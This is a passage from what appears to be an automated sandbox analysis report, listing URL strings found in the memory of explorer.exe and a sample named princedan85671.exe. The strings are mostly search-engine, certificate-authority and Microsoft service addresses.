Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://in.search.yahoo.com/
Source: explorer.exe, 00000007.00000000.2193639072.0000000003C40000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com
Source: explorer.exe, 00000007.00000000.2193639072.0000000003C40000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://it.search.dada.net/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://it.search.dada.net/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://it.search.yahoo.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://jobsearch.monster.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://kr.search.yahoo.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://list.taobao.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
Source: explorer.exe, 00000007.00000000.2194017018.0000000003E27000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: explorer.exe, 00000007.00000000.2194017018.0000000003E27000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://mail.live.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://msk.afisha.ru/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://ocnsearch.goo.ne.jp/
Source: princedan85671.exe, 00000004.00000002.2181351486.000000000072B000.00000004.00000020.sdmp String found in binary or memory: http://ocsp.digicert.com0C
Source: princedan85671.exe, 00000004.00000002.2181351486.000000000072B000.00000004.00000020.sdmp String found in binary or memory: http://ocsp.digicert.com0H
Source: princedan85671.exe, 00000004.00000002.2181351486.000000000072B000.00000004.00000020.sdmp String found in binary or memory: http://ocsp.digicert.com0I
Source: princedan85671.exe, 00000004.00000002.2181351486.000000000072B000.00000004.00000020.sdmp String found in binary or memory: http://ocsp.digicert.com0O
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://openimage.interpark.com/interpark.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://p.zhongsou.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://p.zhongsou.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://price.ru/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://price.ru/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://recherche.linternaute.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://recherche.tf1.fr/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://recherche.tf1.fr/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://rover.ebay.com
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://ru.search.yahoo.com
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://sads.myspace.com/
Source: explorer.exe, 00000007.00000000.2184596718.0000000001C70000.00000002.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search-dyn.tiscali.it/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.about.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.alice.it/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.alice.it/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.aol.co.uk/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.aol.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.aol.in/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.atlas.cz/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.auction.co.kr/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.auone.jp/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.books.com.tw/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.books.com.tw/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.centrum.cz/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.centrum.cz/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.chol.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.chol.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.cn.yahoo.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.daum.net/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.daum.net/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.dreamwiz.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.dreamwiz.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ebay.co.uk/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ebay.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ebay.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ebay.de/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ebay.es/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ebay.fr/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ebay.in/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ebay.it/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.empas.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.empas.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.espn.go.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.gamer.com.tw/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.gamer.com.tw/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.gismeteo.ru/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.goo.ne.jp/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.goo.ne.jp/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.hanafos.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.hanafos.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.interpark.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ipop.co.kr/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ipop.co.kr/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.live.com/results.aspx?q=
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.livedoor.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.livedoor.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.lycos.co.uk/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.lycos.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.lycos.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.msn.co.jp/results.aspx?q=
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.msn.co.uk/results.aspx?q=
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.msn.com.cn/results.aspx?q=
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.msn.com/results.aspx?q=
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.nate.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.naver.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.naver.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.nifty.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.orange.co.uk/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.orange.co.uk/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.rediff.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.rediff.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.seznam.cz/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.seznam.cz/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.sify.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.yahoo.co.jp
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.yahoo.co.jp/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.yahoo.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.yahoo.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.yam.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search1.taobao.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search2.estadao.com.br/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://searchresults.news.com.au/
Source: explorer.exe, 00000007.00000000.2197599515.0000000004F30000.00000002.00000001.sdmp String found in binary or memory: http://servername/isapibackend.dll
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://service2.bfast.com/
Source: explorer.exe, 00000007.00000000.2194017018.0000000003E27000.00000002.00000001.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://sitesearch.timesonline.co.uk/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://so-net.search.goo.ne.jp/
Source: explorer.exe, 00000007.00000000.2194841563.00000000042B3000.00000004.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/2b/a5ea21.ico
Source: explorer.exe, 00000007.00000000.2193421871.00000000039F4000.00000004.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://suche.aol.de/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://suche.freenet.de/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://suche.freenet.de/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://suche.lycos.de/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://suche.t-online.de/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://suche.web.de/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://suche.web.de/favicon.ico
Source: explorer.exe, 00000007.00000000.2208825843.000000000A330000.00000008.00000001.sdmp String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://tw.search.yahoo.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://udn.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://udn.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://uk.ask.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://uk.ask.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://uk.search.yahoo.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://vachercher.lycos.fr/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://video.globo.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://video.globo.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://web.ask.com/
Source: explorer.exe, 00000007.00000000.2195641633.0000000004B50000.00000002.00000001.sdmp String found in binary or memory: http://wellformedweb.org/CommentAPI/
Source: explorer.exe, 00000007.00000000.2194017018.0000000003E27000.00000002.00000001.sdmp String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: explorer.exe, 00000007.00000000.2208825843.000000000A330000.00000008.00000001.sdmp String found in binary or memory: http://www.%s.com
Source: explorer.exe, 00000007.00000000.2184596718.0000000001C70000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.abril.com.br/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.abril.com.br/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.alarabiya.net/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.alarabiya.net/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.amazon.co.jp/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.amazon.co.uk/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword=
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.amazon.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&amp;tag=ie8search-20&amp;index=blended&amp;linkCode=qs&amp;c
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.amazon.de/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.aol.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.arrakis.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.arrakis.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.asharqalawsat.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.asharqalawsat.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.ask.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.auction.co.kr/auction.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.baidu.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.baidu.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.cdiscount.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.cdiscount.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.ceneo.pl/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.ceneo.pl/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.cjmall.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.cjmall.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.clarin.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.cnet.co.uk/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.cnet.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.dailymail.co.uk/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.dailymail.co.uk/favicon.ico
Source: princedan85671.exe, 00000004.00000002.2181351486.000000000072B000.00000004.00000020.sdmp String found in binary or memory: http://www.digicert.com/CPS0
Source: princedan85671.exe, 00000004.00000002.2181351486.000000000072B000.00000004.00000020.sdmp String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.etmall.com.tw/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.etmall.com.tw/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.excite.co.jp/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.expedia.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.expedia.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2195641633.0000000004B50000.00000002.00000001.sdmp String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.gismeteo.ru/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.gmarket.co.kr/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.gmarket.co.kr/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.co.in/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.co.jp/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.co.uk/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.com.br/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.com.sa/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.com.tw/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.cz/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.de/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.es/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.fr/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.it/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.pl/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.ru/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.si/
Source: explorer.exe, 00000007.00000000.2193639072.0000000003C40000.00000002.00000001.sdmp String found in binary or memory: http://www.hotmail.com/oe
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.iask.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.iask.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2194017018.0000000003E27000.00000002.00000001.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
Source: explorer.exe, 00000007.00000000.2195641633.0000000004B50000.00000002.00000001.sdmp String found in binary or memory: http://www.iis.fhg.de/audioPA
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.kkbox.com.tw/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.kkbox.com.tw/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.linternaute.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.maktoob.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.mercadolibre.com.mx/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.mercadolivre.com.br/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.merlin.com.pl/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.merlin.com.pl/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&amp;a=
